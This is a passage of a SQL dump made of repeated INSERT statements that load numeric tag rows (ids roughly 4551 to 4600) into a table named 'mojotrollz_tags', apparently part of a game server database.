(`id`, `table`, `type`, `value`, `comment`) VALUES (4551, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4552, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4552, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4552, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4552, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4552, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4553, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4553, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4553, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4553, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4554, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4554, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4555, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4555, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4555, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4555, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4556, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4556, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4556, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4556, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4557, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4557, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4557, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4557, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4558, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4558, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4558, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4558, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4558, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4559, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4559, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4559, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4559, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4559, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4560, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4560, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4560, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4560, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4561, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4561, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4561, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4561, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4562, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4562, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4562, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4562, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4563, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4563, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4563, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4563, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4563, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4563, 1, 33, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4563, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4564, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4564, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4564, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4564, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4564, 1, 33, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4564, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4565, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4565, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4565, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4565, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4565, 1, 33, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4565, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4566, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4566, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4566, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4566, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4566, 1, 33, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4566, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4567, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4567, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4567, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4567, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4567, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4567, 1, 33, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4567, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4568, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4568, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4568, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4568, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4568, 1, 32, 7, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4568, 1, 33, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4568, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4569, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4569, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4569, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4569, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4569, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4570, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4570, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4570, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4570, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4570, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4571, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4571, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4571, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4571, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4571, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4572, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4572, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4573, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4573, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4573, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4573, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4573, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4574, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4574, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4574, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4574, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4574, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4575, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4575, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4575, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4575, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4575, 1, 35, 12, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4576, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4576, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4576, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4576, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4576, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4577, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4577, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4577, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4577, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4577, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4578, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4578, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4578, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4578, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4578, 1, 32, 13, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4578, 1, 33, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4578, 1, 35, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4580, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4580, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4580, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4580, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4580, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4581, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4581, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4581, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4581, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4581, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4582, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4582, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4582, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4582, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4582, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4583, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4583, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4583, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4583, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4583, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4584, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4584, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4584, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4584, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4584, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4585, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4585, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4585, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4585, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4585, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4586, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4586, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4586, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4586, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4586, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4587, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4587, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4587, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4587, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4587, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4588, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4588, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4588, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4588, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4588, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4589, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4589, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4589, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4589, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4589, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4590, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4590, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4590, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4590, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4590, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4591, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4591, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4591, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4591, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4591, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4592, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4592, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4592, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4592, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4592, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4593, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4593, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4593, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4593, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4594, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4594, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4594, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4594, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4595, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4595, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4596, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4596, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4596, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4596, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4596, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4597, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4597, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4597, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4597, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4597, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4598, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4598, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4598, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4598, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4599, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4599, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4599, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4599, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4599, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4600, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4600, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4600, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` 